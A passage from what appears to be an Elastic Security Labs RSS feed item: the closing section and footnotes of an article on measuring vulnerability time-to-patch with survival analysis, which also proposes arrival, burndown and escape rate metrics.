<h2>Final Thoughts</h2>
<p>The benefits of using survival analysis come not only from more accurate measurement but also from the insights into the dynamics of patching behaviour, showing where bottlenecks occur, factors that affect patching velocity and whether it aligns with our SLO. From a technical integration perspective, the use of survival analysis as part of our operational workflows and reporting can be achieved with minimal additional changes to our current Elastic Stack setup: survival analysis can run on the same cadence as our patching cycle with the results being pushed back into Kibana for visualization. The definitive advantage is to pair our existing operational metrics with survival analysis for both long-term trends and short-term performance tracking.</p>
<p>Looking forward, we’re experimenting with additional new metrics like <strong>Arrival Rate</strong>, <strong>Burndown Rate</strong>, and <strong>Escape Rate</strong> that give us a way to move toward a more dynamic understanding of how vulnerabilities are really handled.</p>
<p><strong>Arrival Rate</strong> is the measure of how quickly new vulnerabilities are entering the environment. Knowing that fifty new CVEs show up each month, for example, tells us what to expect in the workload before we even start measuring patches. So the arrival rate is a metric that does not necessarily inform about the backlog, but more about the pressure applied to the system.</p>
<p><strong>Burndown Rate</strong> (trend) shows the other half of the equation: how quickly vulnerabilities are being remediated relative to how fast they arrive.</p>
<p><strong>Escape Rate</strong> adds yet another dimension by focusing on vulnerabilities that slip past the points where they should have been contained. In our context, an escape is about CVEs that miss patching windows or exceed SLO thresholds. An elevated escape rate doesn’t just show that vulnerabilities exist but it also shows that the process designed to control them is failing, whether because patching cycles are too slow, automation processes are lacking, or compensating controls are not working as intended.</p>
<p>Together, the metrics create a better picture: arrival rate tells us how much new risk is being introduced; burndown trends show whether we are keeping pace with that pressure or being overwhelmed by it; escape rates expose where vulnerabilities persist despite planned controls.</p>
<p>[1]:An outlier in statistics is a data point that is very far from the central tendency (or far from the rest of the values in a dataset). For example, if most vulnerabilities are patched within 30 days, but one takes 600 days, that 600-day case is an outlier. Outliers can pull averages upward or downward in ways that don’t reflect the “typical” experience. In the patching context, these are the especially slow-to-patch vulnerabilities that sit open far longer than the norm. They may represent rare but important situations, like systems that can’t be easily updated, or patches that require extensive testing.</p>
<p>[2]: Note: The current 6-month dataset includes both all vulnerabilities that remain open at the end of the observation period (independent of how long ago they have been open /first seen) and all vulnerabilities that were closed during the 6-month window. Despite this mixed cohort approach, survival curves from prior observation windows show consistent trends, particularly in the early part of the curve. The shape and slope over the first 30–60 days have proven remarkably stable across snapshots, suggesting that metrics like median time-to-patch and early-stage remediation behavior are not artifacts of the short observation window. While long-term estimates (e.g. 90th percentile) remain incomplete in shorter snapshots, the conclusions drawn from these cohorts still reflect persistent and reliable patching dynamics.</p>
<p>[3]:We kept the CDF on a monthly cadence for operational reporting (throughput and SLO adherence for work completed during the current month), while the Kaplan-Meier uses a 6-month window to properly handle censoring and expose tail risk across the broader cohort.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/Security Labs Images 7.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>